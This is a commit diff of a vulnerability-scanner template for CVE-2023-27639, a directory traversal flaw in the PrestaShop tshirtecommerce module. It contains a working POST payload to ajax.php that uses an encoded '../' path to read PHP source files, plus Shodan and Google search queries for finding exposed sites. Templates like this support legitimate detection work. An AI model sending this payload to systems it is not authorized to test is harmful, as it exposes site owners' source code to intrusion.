updated req,matcher & metadata
parent
e7ed4d1cb0
commit
71f681c9a7
|
@ -1,32 +1,43 @@
|
|||
id: CVE-2023-27639
|
||||
|
||||
info:
|
||||
name: PrestaShop tshirtecommerce Directory Traversal
|
||||
name: PrestaShop TshirteCommerce - Directory Traversal
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
|
||||
The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2023-27639/
|
||||
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
|
||||
classification:
|
||||
cve-id: CVE-2023-27639
|
||||
metadata:
|
||||
max-request: 1
|
||||
product: tshirtecommerce
|
||||
verified: true
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: cve,cve2023,prestashop,lfi
|
||||
product: tshirtecommerce
|
||||
google-query: inurl:"/tshirtecommerce/"
|
||||
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
|
||||
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
|
||||
headers:
|
||||
- raw:
|
||||
- |
|
||||
POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SqlFormatter Examples"
|
||||
- type: word
|
||||
words:
|
||||
- "?php"
|
||||
- "SqlFormatter"
|
||||
- "<?php"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue